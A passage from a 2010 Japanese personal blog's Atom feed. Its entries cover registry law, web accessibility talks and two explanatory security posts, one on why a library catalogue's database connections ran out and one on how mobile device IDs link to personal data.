class="note">※余談ですが、現在では初婚の場合は上記のように新戸籍が作られます。今も婚姻を「入籍」と呼ぶことがありますが、それは戦前の旧民法の名残です。なお、「入籍」という手続き自体は現在もあって、それは離婚時の子の姓の変更に利用されています。</p><ul class="comment-link"><li><a href="../topic/4326/comment">「日本では別姓夫婦を戸籍に記載できる」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E6%B3%95%E5%BE%8B">法律</a> / <a href="../genre/%E6%80%9D%E3%81%A3%E3%81%9F%E3%81%93%E3%81%A8">思ったこと</a></span></p></div></div></content></entry><entry><title>日本ウェブ協会アカデミックプログラム Vol.13「Webアクセシビリティの基礎と2010年JIS改定のポイント」: 当日</title><link href="http://bakera.jp/ebi/topic/4273" /><id>tag:bakera.jp,2008:/ebi/topic/4273</id><updated>2010-11-04T15:20:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2010/10/25">2010年10月25日(月曜日)</a></h1><div class="topic"><h2><a href="../topic/4273">日本ウェブ協会アカデミックプログラム Vol.13「Webアクセシビリティの基礎と2010年JIS改定のポイント」: 当日</a></h2><p class="subinfo"><span class="updated">更新: 2010年11月4日15時20分頃</span></p><p><a href="http://www.w2c.jp/Activity/Education/Academic/13_20101025/index.html">学生会員向け：アカデミックプログラム Vol.13「Webアクセシビリティの基礎と2010年JIS改定のポイント」</a> <em class="domain-info">(www.w2c.jp)</em>、終了しました。聴きに来てくださったみなさま、Ustreamでご試聴くださったみなさま、ありがとうございました。</p><p>録画が以下で見られます。</p><ul><li><a href="http://www.ustream.tv/recorded/10415325">[AP13-1]Webアクセシビリティの基礎と2010年JIS改定のポイント</a> <em class="domain-info">(www.ustream.tv)</em></li></ul><p>どうも音声がうまく入っていなかったようで、収録されているものはTake3です。</p><p class="note">※追記:しかも後半は録画に失敗していたそうで、休憩後の部分は録画がありません。すみません……。</p><p>スライドのPDFを以下に置いておきますので、興味ありましたらどうぞ。</p><ul><li><a href="../../downloads/pdf/w2c_accessibility_jis_01">Webアクセシビリティの基礎と 2010年JIS改定のポイント</a></li></ul><p class="note">※しれっと図書館ネタが入っていますが他意はありません。特定の企業や特定のサイトだけの問題ではないということでひとつ……。</p><ul class="comment-link"><li><a href="../topic/4273/comment">「日本ウェブ協会アカデミックプログラム Vol.13「Webアクセシビリティの基礎と2010年JIS改定のポイント」: 当日」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E8%AC%9B%E6%BC%94">講演</a> / <a href="../genre/%E3%82%A2%E3%82%AF%E3%82%BB%E3%82%B7%E3%83%93%E3%83%AA%E3%83%86%E3%82%A3">アクセシビリティ</a> / <a href="../genre/W2C">W2C</a></span></p></div></div></content></entry><entry><title>日本ウェブ協会アカデミックプログラム Vol.13「Webアクセシビリティの基礎と2010年JIS改定のポイント」: 前日</title><link href="http://bakera.jp/ebi/topic/4271" /><id>tag:bakera.jp,2008:/ebi/topic/4271</id><updated>2010-10-25T14:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2010/10/24">2010年10月24日(日曜日)</a></h1><div class="topic"><h2><a href="../topic/4271">日本ウェブ協会アカデミックプログラム Vol.13「Webアクセシビリティの基礎と2010年JIS改定のポイント」: 前日</a></h2><p class="subinfo"><span class="updated">更新: 2010年10月25日14時0分頃</span></p><p>明日になりました……<a href="http://www.w2c.jp/Activity/Education/Academic/13_20101025/index.html">学生会員向け：アカデミックプログラム Vol.13「Webアクセシビリティの基礎と2010年JIS改定のポイント」</a> <em class="domain-info">(www.w2c.jp)</em>。</p><p>おおむね以下のような話をする予定です。</p><ul><li>アクセシビリティとは?</li><li><a href="http://twitter.com/kotarok/status/8012754790">アクセシビリティなんだよ!</a> <em class="domain-info">(twitter.com)</em></li><li>支援技術とマッシュアップ</li><li>ある日の岡崎市立中央図書館</li><li>アクセシビリティ・サポーテッド</li><li>JIS X 8341-3と2010年版改正のポイント、改正の影響</li><li>わかりにくい達成基準の例: 文字サイズ変更ボタンのあれこれ</li></ul><p>以下で19:30から中継がある予定ですので、興味をお持ちの方はどうぞ。</p><ul><li><a href="http://www.ustream.tv/channel/openacademic">OpenAcademic on USTREAM: 学生会員向けのアカデミックプログラムの一般公開チャンネル</a> <em class="domain-info">(www.ustream.tv)</em></li></ul><ul class="comment-link"><li><a href="../topic/4271/comment">「日本ウェブ協会アカデミックプログラム Vol.13「Webアクセシビリティの基礎と2010年JIS改定のポイント」: 前日」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E8%AC%9B%E6%BC%94">講演</a> / <a href="../genre/%E3%82%A2%E3%82%AF%E3%82%BB%E3%82%B7%E3%83%93%E3%83%AA%E3%83%86%E3%82%A3">アクセシビリティ</a> / <a href="../genre/W2C">W2C</a></span></p></div></div></content></entry><entry><title>岡崎市立中央図書館のサービスが停止した理由</title><link href="http://bakera.jp/ebi/topic/4226" /><id>tag:bakera.jp,2008:/ebi/topic/4226</id><updated>2010-08-26T00:30:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2010/8/21">2010年8月21日(土曜日)</a></h1><div class="topic"><h2><a href="../topic/4226">岡崎市立中央図書館のサービスが停止した理由</a></h2><p class="subinfo"><span class="updated">更新: 2010年8月26日0時30分頃</span></p><p><a href="../topic/4225">朝日の報道</a>と前後して、高木さんからも情報が出ていますね……「<a href="http://takagi-hiromitsu.jp/diary/20100821.html#p01">Anonymous FTPで公開されていたGlobal.asaが示すもの 岡崎図書館事件(6)</a> <em class="domain-info">(takagi-hiromitsu.jp)</em>」。</p><p>福岡県の篠栗町立図書館のサイトにFTPサーバが立っていて、Anonymous FTPでソースコードらしきものが取得できたというお話のようで。今どきFTPのポートが開いているというだけでも驚きますが、Anonymous FTPは物凄いですね。</p><p class="note">※私の記憶では、Windows 2000 ServerのFTPサービスはデフォルトで匿名アクセスが有効になっていたような気がします。Windows Server 2003ではFTPを使おうと思ったこと自体がないので、最近どうなっているのかは良く分かりませんが。</p><p class="note">※2010-08-26追記: デフォルト設定どころか、管理会社 (MDISとは別らしい) が故意に認証を外したらしく、しかも書き込み可能だったという説があるようで……<a href="http://twitter.com/HiromitsuTakagi/status/22096009910">http://twitter.com/HiromitsuTakagi/status/22096009910</a> <em class="domain-info">(twitter.com)</em>。それは想像もできませんでした。にわかには信じがたい話ですが、事実だとすれば驚愕の一言です。</p><p>以前から、MELIL/CSはSession_OnStartでDBコネクションを確立しているのではないかと推察されていました。高木さんが取得したGlobal.asaの内容は、まさにその予想を裏付けるものでした。</p><p>この実装では、セッション開始の際にDBへの接続が確立され、セッション終了時に破棄されます。しかし、この図書館の蔵書検索は、そもそもログインして使うサービスではありません。ログアウトの機能もありませんから、ユーザーのログアウトでセッションが終了することはありません。ユーザーがサイトから離脱してもサーバ側にはセッションが残り、タイムアウトになるまで維持されます。タイムアウトまでの時間は設定によりますが、IISのデフォルトでは20分です。</p><div class="figure"><img src="../img/iis-session-setting" alt="" width="471" height="416" /></div><p>さらに注目するべきは、セッションがCookieで管理されているということです。誰かがブラウザでこのアプリケーションにアクセスすると、アプリケーションではセッションが開始され、そのセッションIDを含むCookieが発行されます。次回アクセス時には、ブラウザからアプリケーションにCookieが送られ、アプリケーションはそのCookieを見て、同一セッションであるかどうかを判断します。</p><p>では、ブラウザのCookieが無効だったらどうなるでしょうか。この場合、初回アクセス時にセッションが開始されてCookieが発行されますが、ブラウザはそのCookieを無視します。次回アクセス時にはCookieが送られてこないため、アプリケーションは初回アクセスだと判断します。アプリケーションは別のセッションを開始し、別のCookieを発行します。</p><p>つまり、Cookie無効状態でアクセスされると、アプリケーションはどんどん新しいセッションを作ります。普通はそれでも大した問題は起きないのですが、セッション開始時にDB接続を確立する場合、DBへの接続数がどんどん増えていくことになります。DB接続できる本数には限りがありますから、その上限に達するとDB接続できなくなり、エラーで終了してしまいます。たとえば以下のようなエラーメッセージが出ることになります。</p><div class="quote-and-cite"><blockquote><p>Oracle Automation エラー '800a01b8' 接続できません。,ORA-00020: maximum number of processes (150) exceeded</p><p>/LM/W3SVC/1/Root/tosho/global.asa, 行 31</p></blockquote></div><p>これは、私が尼崎市立図書館のサイトで目撃したメッセージです。岡崎市立中央図書館においては、このエラーが On Error Resume Next で飛ばされ、別の場所でエラーになっていたと考えられています。いずれにしても、DB接続数が上限に達してしまい、サービスを継続できなくなるという現象が発生します。CPUパワーやメモリ、ディスクの容量などとは全く関係なく発生します。</p><p>ふつう、クローラはCookieを送出しませんから、クローラがアクセスしてくると一気に大量のDB接続が発生することになります。だからrobots.txtでクローラのアクセスを拒否していたのでしょう。</p><p>ではCookie有効のブラウザであれば問題が起きないかというと、そうでもありません。多くの人がアクセスしてきた場合、アクセスしてきた人数分だけDB接続が発生し、タイムアウトまで維持されます。短時間の間に多くの人が来れば、負荷がそれほど高くなくてもサービスが停止してしまうおそれがあります。</p><p>そもそも、セッション開始時にDB接続を確立するような設計がナンセンスなのであって、その設計を見直すべきです。高木さんの報告によれば、ASP.NET版では実際に見直しがされているようですね。</p><p class="note">※どうでも良い話ですが、「'エラー対策？」というコメントが秀逸で笑ってしまいました。「エラー対策」と書くなら分かるのですが、どうして疑問形で書かれているのでしょうか。</p><ul class="comment-link"><li><a href="../topic/4226/comment">「岡崎市立中央図書館のサービスが停止した理由」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E5%B2%A1%E5%B4%8E%E5%B8%82%E7%AB%8B%E4%B8%AD%E5%A4%AE%E5%9B%B3%E6%9B%B8%E9%A4%A8%E4%BA%8B%E4%BB%B6">岡崎市立中央図書館事件</a> / <a href="../genre/librahack">librahack</a></span></p></div></div></content></entry><entry><title>アマ検</title><link href="http://bakera.jp/ebi/topic/2956" /><id>tag:bakera.jp,2008:/ebi/topic/2956</id><updated>2010-08-17T00:55:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2007/7/24">2007年7月24日(火曜日)</a></h1><div class="topic"><h2><a href="../topic/2956">アマ検</a></h2><p class="subinfo"><span class="updated">更新: 2010年8月17日0時55分頃</span></p><p>Amazon の各商品には「ASIN」と呼ばれる商品 ID がついています。Amazon にアフィリエイトのリンクを張りたいときには ASIN を調べるのですが、検索結果の一覧では ASIN が表示されません。リンク先の詳細ページを開くと、その中程に商品スペックと一緒に書かれているのですが、これを探すのも結構面倒です。</p><p>……と思っていたのですが、せっかく Web サービスが使えるようになったので、検索しつつ一覧に ASIN を表示するものを作ってみました。それが<a href="../../amazon">アマ検</a>。名前テキトーな上に実装もテキトーなので、スタイルも当たっていないしいろいろ変な挙動もありますが、まあ私が自分で使うぶんにはこれでも良いかなということで。</p><p class="note">※べつに皆さん使っていただいて構いませんが、生成されるリンクは bakera.jp のアフィリエイトつきです。アフィリエイトが生理的に駄目な方はご注意ください。</p><p>で、試しにいろいろ検索してみたのですが、なんかテスト商品とかいっぱいヒットしてしまいますね。「<span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/B000OGDU5M&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">藤田TEST商店</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=B000OGDU5M" alt="" width="1" height="1" /></span>」とか、謎すぎるのですが……。</p><p class="note">※ちなみに「"」を含む文字列を検索すると死にますが、どうも HttpHandler がパスに %22 を含む URL を扱えないようで、hatomaru.dll に値が渡る前に例外が出ています。IIS か ASP.NET 自体の問題っぽい気がしていますが、回避策あるのでしょうか……。</p><p class="note">※2010-08-16追記: 回避策はいろいろありました……<a href="../topic/4197">URLに%22が含まれると例外が出る問題</a>、<a href="../topic/4200">URLに%22が含まれても何とかする方法</a>、<a href="../topic/4208">.NET Framework4 / ASP.NET4を導入</a>。</p><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/2956/comment">「アマ検」へのコメント (20件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/hatomaru.dll">hatomaru.dll</a> / <a href="../genre/C%EF%BC%83">C#</a></span></p></div></div></content></entry><entry><title>HTML4.01邦訳が読めなくなっている問題</title><link href="http://bakera.jp/ebi/topic/4206" /><id>tag:bakera.jp,2008:/ebi/topic/4206</id><updated>2010-08-08T13:15:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2010/8/7">2010年8月7日(土曜日)</a></h1><div class="topic"><h2><a href="../topic/4206">HTML4.01邦訳が読めなくなっている問題</a></h2><p class="subinfo"><span class="updated">更新: 2010年8月8日13時15分頃</span></p><p>HTML4.01邦訳は以下のURLで知られていますが、</p><ul><li><a href="http://www.asahi-net.or.jp/~sd5a-ucd/rec-html401j/cover.html">http://www.asahi-net.or.jp/~sd5a-ucd/rec-html401j/cover.html</a> <em class="domain-info">(www.asahi-net.or.jp)</em></li></ul><p>これが昨日(8月5日)から Not Found になっています。URLを削って一つ上のディレクトリにアクセスしてみると、ファイル一覧が見えます。そこで適当なファイルを選ぶと、見たかった内容にアクセスできます。</p><ul><li><a href="http://www.asahi-net.or.jp/~sd5a-ucd/rec-html401j/cover.html.ja.sjis">http://www.asahi-net.or.jp/~sd5a-ucd/rec-html401j/cover.html.ja.sjis</a> <em class="domain-info">(www.asahi-net.or.jp)</em></li></ul><p>どうも、ASAHIネットのApacheの設定が変わってしまったようですね。少なくとも以下2点が変更されています。</p><ul><li>MultiViewsが無効になり、コンテント・ネゴシエーションが動作しなくなった</li><li>Options Indexesが有効になり、ファイル一覧が見えるようになった</li></ul><p>1日経っても直る気配がないので問い合わせてみたところ、すぐに返事がいただけました。土曜日なのに素晴らしいですね。</p><div class="quote-and-cite"><blockquote><p>個人ホームページサービスのサーバのメンテナンスによる影響かと思われますが、現在担当部署に確認を行っております。</p><p>誠に恐縮ではございますが、今しばらくお待ちいただきますようお願い申し上げます。</p></blockquote></div><p>というわけで、そのうち直るのではないかと思います。</p><p class="note">※あるいは「担当部署」は土日休みという可能性もありますが、週明けには直るでしょう。たぶん。</p><p class="note">※追記: 8月8日の昼頃から復旧しているようです。</p><ul class="comment-link"><li><a href="../topic/4206/comment">「HTML4.01邦訳が読めなくなっている問題」へのコメント (1件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/ASAHI%E3%83%8D%E3%83%83%E3%83%88">ASAHIネット</a></span></p></div></div></content></entry><entry><title>日本ウェブ協会アカデミックプログラム Vol.7「HTML仕様書を読む」: 当日</title><link href="http://bakera.jp/ebi/topic/4193" /><id>tag:bakera.jp,2008:/ebi/topic/4193</id><updated>2010-07-18T22:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2010/7/17">2010年7月17日(土曜日)</a></h1><div class="topic"><h2><a href="../topic/4193">日本ウェブ協会アカデミックプログラム Vol.7「HTML仕様書を読む」: 当日</a></h2><p class="subinfo"><span class="updated">更新: 2010年7月18日22時0分頃</span></p><p><a href="http://www.w2c.jp/Activity/Education/Academic/20100717/">学生会員向け：アカデミックプログラム Vol.7「HTML仕様書を読む」</a> <em class="domain-info">(www.w2c.jp)</em>、本日13:00からとなります。以下のURLで生放送される予定ですので、興味ありましたらご覧ください。</p><ul><li><a href="http://www.ustream.tv/channel/openacademic">http://www.ustream.tv/channel/openacademic</a> <em class="domain-info">(www.ustream.tv)</em></li></ul><p>……というわけで無事に終わりました。視聴してくださった皆様、ありがとうございました。以下に録画がありますので、見逃したという方はどうぞ。</p><ul><li><a href="http://www.ustream.tv/recorded/8325542">［AP07-1］HTML仕様書を読む：講義1</a> <em class="domain-info">(www.ustream.tv)</em></li><li><a href="http://www.ustream.tv/recorded/8326990">［AP07-2］HTML仕様書を読む：講義2＋ディスカッション</a> <em class="domain-info">(www.ustream.tv)</em></li></ul><p>資料は以下で公開されています (PDF)。</p><ul><li><a href="http://www.w2c.jp/Activity/Education/Academic/20100717/read-HTML-spec-1.pdf">http://www.w2c.jp/Activity/Education/Academic/20100717/read-HTML-spec-1.pdf</a> <em class="domain-info">(www.w2c.jp)</em></li></ul><p>Ustreamは初めてだったので、いろいろ戸惑った点もありました。最大の反省点は、視線が定まらなかった点。会場の参加者を見て話せば良いのか、カメラを見て話せば良いのかイマイチ分からず、目がモニターとプロジェクターを行ったり来たりしてしまうという、挙動不審な感じになってしまいました。</p><p>話すスピードが速いというご意見もあったようで……いや、これ今回に限らずいつも言われてしまうので、基本的に私の話すペースが速いのだと思います。もう少しゆっくり話した方が良いですね。</p><p class="note">※2010-07-18追記: 一部訂正・補足事項がありますので、<a href="../../profile/read-html-spec">サポートページ</a>を作成しました。あわせてご覧ください。えむけいさん、コメントありがとうございます。</p><ul class="comment-link"><li><a href="../topic/4193/comment">「日本ウェブ協会アカデミックプログラム Vol.7「HTML仕様書を読む」: 当日」へのコメント (4件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E8%AC%9B%E6%BC%94">講演</a> / <a href="../genre/HTML">HTML</a> / <a href="../genre/W2C">W2C</a></span></p></div></div></content></entry><entry><title>日本ウェブ協会アカデミックプログラム Vol.7「HTML仕様書を読む」</title><link href="http://bakera.jp/ebi/topic/4190" /><id>tag:bakera.jp,2008:/ebi/topic/4190</id><updated>2010-07-13T12:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2010/7/12">2010年7月12日(月曜日)</a></h1><div class="topic"><h2><a href="../topic/4190">日本ウェブ協会アカデミックプログラム Vol.7「HTML仕様書を読む」</a></h2><p class="subinfo"><span class="updated">更新: 2010年7月13日12時0分頃</span></p><p>7月17日の土曜日にこんなお話をすることになりました …… <a href="http://www.w2c.jp/Activity/Education/Academic/20100717/">学生会員向け：アカデミックプログラム Vol.7「HTML仕様書を読む」</a> <em class="domain-info">(www.w2c.jp)</em>。</p><p>基本的に学生さん向けのお話になるのですが、Ustreamでの一般公開も予定していますので、どなたでも視聴できます。7月17日の13:00から、以下のURLで生放送される予定です。</p><ul><li><a href="http://www.ustream.tv/channel/openacademic">http://www.ustream.tv/channel/openacademic</a> <em class="domain-info">(www.ustream.tv)</em></li></ul><p>お話しする内容はまだ確定ではありませんが、今のところこんな感じを予定しています。</p><ul><li>仕様書を読むための前提知識
<ul><li>仕様とは?</li><li>Web技術の仕様と標準化</li><li>標準化団体と標準化プロセス</li><li>HTMLとは</li><li>HTMLの歴史</li></ul></li><li>HTML4.01仕様書の読み方</li><li>なぜ仕様を守るのか</li></ul><p>仕様書を読むというタイトルではありますが、私が仕様書を全部読み上げたりということは想定していません。SGML宣言を延々読んだり、ということもありません。また、HTML5の話はほとんど出ない予定です。Web業界で仕事をされている方やプログラマの方などには、既知の話になると思います。</p><p>と、こんな感じですが、もし興味をお持ちの方がいらっしゃいましたら、ご覧いただければと思います。</p><p class="note">※Ustreamは初めてですので、うまくしゃべれるのかどうか、いまいち自信がありませんが。</p><ul class="comment-link"><li><a href="../topic/4190/comment">「日本ウェブ協会アカデミックプログラム Vol.7「HTML仕様書を読む」」へのコメント (4件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E8%AC%9B%E6%BC%94">講演</a> / <a href="../genre/HTML">HTML</a> / <a href="../genre/W2C">W2C</a></span></p></div></div></content></entry><entry><title>個体識別番号は個人情報と容易に結びつく</title><link href="http://bakera.jp/ebi/topic/4124" /><id>tag:bakera.jp,2008:/ebi/topic/4124</id><updated>2010-06-01T11:35:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2010/5/12">2010年5月12日(水曜日)</a></h1><div class="topic"><h2><a href="../topic/4124">個体識別番号は個人情報と容易に結びつく</a></h2><p class="subinfo"><span class="updated">更新: 2010年6月1日11時35分頃</span></p><p>「<a href="http://takagi-hiromitsu.jp/diary/20100512.html#p01">KDDIの固体バカが言う「EZ番号はプライバシーに関する情報ではない」</a> <em class="domain-info">(takagi-hiromitsu.jp)</em>」。</p><p>「固体」ではなく「個体」が正解なのですが、KDDIのドキュメントには「固体」と記述してあるという。まあ、それは単なる変換ミスの類でしょうが、問題なのはその記述の内容の方ですね。</p><div class="quote-and-cite"><blockquote cite="http://cs119.kddi.com/faq/1032/app/servlet/qadoc?QID=000021"><p>■EZ番号はお客さまがURLにアクセスした際にサイト提供元のサーバに通知され、会員のアクセス管理などに利用されますが携帯電話番号やメールアドレス、氏名などのプライバシーに関する情報は含まれておりませんのでご安心ください。</p></blockquote><p class="cite">以上、<a href="http://cs119.kddi.com/faq/1032/app/servlet/qadoc?QID=000021">[000021]EZ番号（固体識別番号）を変更したい。</a> より</p></div><p class="note">※2010-06-01追記: 上記の記述は削除されたようで、現在は確認できません。</p><p>確かに、EZ番号それ自体には個人情報は含まれていないでしょう。しかし問題は、個人情報と簡単に結びつくという点です。たとえば、以下のようにすると……</p><ul><li>特定のURLを含んだメールを大量送信する</li><li>そのURLに、送信先のメールアドレスを付与しておく (メールアドレスそのものである必要はない)</li><li>URLにアクセスしてきた端末のEZ番号を取得し、URLに含まれるメールアドレスの情報と組み合わせて記録する</li></ul><p>これでEZ番号とメールアドレスが結びつきます。そして、このEZ番号とメールアドレスの組みが他のサイトに提供されると……そのサイトでは、アクセスしてきた人のEZ番号を取得し、メールアドレスを知ることができるようになります。</p><p>この例はメールに記載されたURLにアクセスさせるという方法ですが、結びつけの方法は他にもあります。たとえば会員制のサイトでは、会員情報登録の際に入力した情報とEZ番号とを結びつけてDBに保存しています。これはどのサイトも普通にやっていることですが、SQLインジェクションでDBの内容が漏洩したりすれば、利用者にとっては厳しいことになります。</p><p>そのため、個体識別番号をそのままDBに格納するのではなく、ハッシュ関数を通してハッシュ値だけ記録するようにしているサイトもあるようです。ただ、キャリア側からそのような指導が行われている気配もありませんし、むしろ「安全です」と言ってしまっているわけですから、そのような取り組みの必要性は認識されていません。わざわざそのような処理をしているサイトは少ないでしょう。</p><p>EZ番号それ自体に個人情報が含まれるかどうかは、どうでも良い話なのです。それを個人情報と結びつけることが出来るか、実際に結びついているかが問題です。</p><p>ちなみに、CookieやIPアドレスも個人情報と結びつけることが可能です。もっとも、これらが個人情報と結びつけられても、その結びつきは限定されています。Cookieの場合はブラウザ側で削除できますし、そもそも発行したサイト以外からは読み取れません。IPアドレスの場合、同じ値がずっと使われるとは限りませんし、そもそも個人と一対一対応しているわけでもありません。</p><p class="note">※プライバシーポリシーに「CookieやIPアドレスは個人情報ではありません」と書いている企業もあるようですが、それ自体が個人情報かどうかは問われません。そうではなく、「当社ではCookieやIPアドレスを個人情報と結びつけません」と書かなければなりません。</p><p>それに対して、EZ番号はどうでしょうか。削除できず、変更できず、どのサイトからも同じ値を読み出し可能であるとすれば、それはかなり強固な結びつきになるのではないかと思います。</p><ul class="comment-link"><li><a href="../topic/4124/comment">「個体識別番号は個人情報と容易に結びつく」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E3%83%97%E3%83%A9%E3%82%A4%E3%83%90%E3%82%B7%E3%83%BC">プライバシー</a> / <a href="../genre/%E3%83%A2%E3%83%90%E3%82%A4%E3%83%AB">モバイル</a></span></p></div></div></content></entry><entry><title>子ども手当のあれこれ</title><link href="http://bakera.jp/ebi/topic/4098" /><id>tag:bakera.jp,2008:/ebi/topic/4098</id><updated>2010-04-08T01:45:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2010/4/6">2010年4月6日(火曜日)</a></h1><div class="topic"><h2><a href="../topic/4098">子ども手当のあれこれ</a></h2><p class="subinfo"><span class="updated">更新: 2010年4月8日1時45分頃</span></p><p>子ども手当に関して、いろいろなデマ情報が飛び交っているようですね。見た瞬間に「これはありえない」と思えるようなものもリツイートされてくるのですが、笑い話としてリツイートしているのか、本気で信じているのか、判断に苦しみます……。</p><p>とりあえず、厚生労働省のサイトに「<a href="http://www.mhlw.go.jp/bunya/kodomo/osirase/100402-1.html">厚生労働省：子ども手当について</a> <em class="domain-info">(www.mhlw.go.jp)</em>」というコンテンツがあります。受給の要件なども書かれているので、「そんなアホな!?」と思ったら、リツイートする前に一読してみると良いのではないかと思います。</p><p>そんなあれこれに対応するためなのか、新たに「子ども手当について 一問一答」というドキュメントが追加されたようです。たとえば、以下のような項目について回答されています。</p><ul><li>児童養護施設に入所している子どもにも子ども手当は支給されますか。</li><li>子ども手当は在日外国人の子どもが海外に居住する場合にも支給されるのですか。</li><li>なぜ、平成２２年度の子ども手当から子どもの日本国内居住要件を設けないのですか。</li></ul><p>さらに読んでいくと、こんなピンポイントな質問も。</p><div class="quote-and-cite"><blockquote cite="http://www.mhlw.go.jp/bunya/kodomo/osirase/dl/100402-1s.pdf"><p>母国で５０人の孤児と養子縁組を行った外国人にも子ども手当は支給されますか。</p><p>A. 母国で５０人の孤児と養子縁組を行った外国人については、支給要件を満たしませんので、子ども手当は支給されません。</p></blockquote><p class="cite">以上、<a href="http://www.mhlw.go.jp/bunya/kodomo/osirase/dl/100402-1s.pdf">子ども手当について 一問一答</a> より</p></div><p>というわけで内容はまともなのですが、しかし……何なのでしょうね、このフォントは。同じところに掲載されている他のPDFは普通にゴシックや明朝体が使われているのですが、この一問一答だけは何故かポップ体のフォントが使われています。それも見出しだけならともかく、本文も全てポップ体の太字なので、読みにくいこと読みにくいこと。</p><p>いったい、どういう意図でポップ体を選択したのか。その意味は私には一つしか考えられませんでした。すなわち、これは……ちよちゃんの台詞だということです! つまり我々は、この文章をちよちゃんの台詞とみなして読めば良いわけですね。</p><p class="note">※初期の<span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/4840214670&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">あずまんが大王</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=4840214670" alt="" width="1" height="1" /></span>では、ちよちゃん (美浜ちよ) の台詞だけがポップ体の写植になっていました。ちなみに<span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/4091216951&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">新装版</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=4091216951" alt="" width="1" height="1" /></span>では他の人と同じフォントになっています。</p><p>まあ、それ以前に、PDF形式になっていること自体どうなのかという疑問もありますけれども。もう少し読みやすくならないものでしょうかね……。</p><p class="note">※2010-04-08追記: HTML版も用意されたようです……「<a href="http://www.mhlw.go.jp/bunya/kodomo/osirase/100407-1.html">子ども手当について　一問一答</a> <em class="domain-info">(www.mhlw.go.jp)</em>」(Argrathさん情報ありがとうございます)。元のPDFよりだいぶ読みやすくなっていると思います。</p><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/4098/comment">「子ども手当のあれこれ」へのコメント (2件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E6%B3%95%E5%BE%8B">法律</a> / <a href="../genre/%E6%80%9D%E3%81%A3%E3%81%9F%E3%81%93%E3%81%A8">思ったこと</a></span></p></div></div></content></entry><entry><title>URLを知られたらアウトな管理画面</title><link href="http://bakera.jp/ebi/topic/4097" /><id>tag:bakera.jp,2008:/ebi/topic/4097</id><updated>2010-04-03T23:20:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2010/4/3">2010年4月3日(土曜日)</a></h1><div class="topic"><h2><a href="../topic/4097">URLを知られたらアウトな管理画面</a></h2><p class="subinfo"><span class="updated">更新: 2010年4月3日23時20分頃</span></p><p><a href="http://www.messe-sanoh.co.jp/">メッセサンオー</a> <em class="domain-info">(www.messe-sanoh.co.jp)</em>で個人情報が流出したというお話が。</p><ul><li><a href="http://www.security-next.com/012351.html">秋葉原ゲームショップの顧客情報が閲覧可能に - アダルトソフト購入履歴なども流出</a> <em class="domain-info">(www.security-next.com)</em></li><li><a href="http://www.yomiuri.co.jp/net/security/goshinjyutsu/20100402-OYT8T00757.htm">ＰＣゲーム通販大手の顧客名簿が流出</a> <em class="domain-info">(www.yomiuri.co.jp)</em></li><li><a href="http://internet.watch.impress.co.jp/docs/news/20100402_358712.html">メッセサンオー、PCゲーム通販の顧客情報がネットで流出</a> <em class="domain-info">(internet.watch.impress.co.jp)</em></li></ul><p>Internet 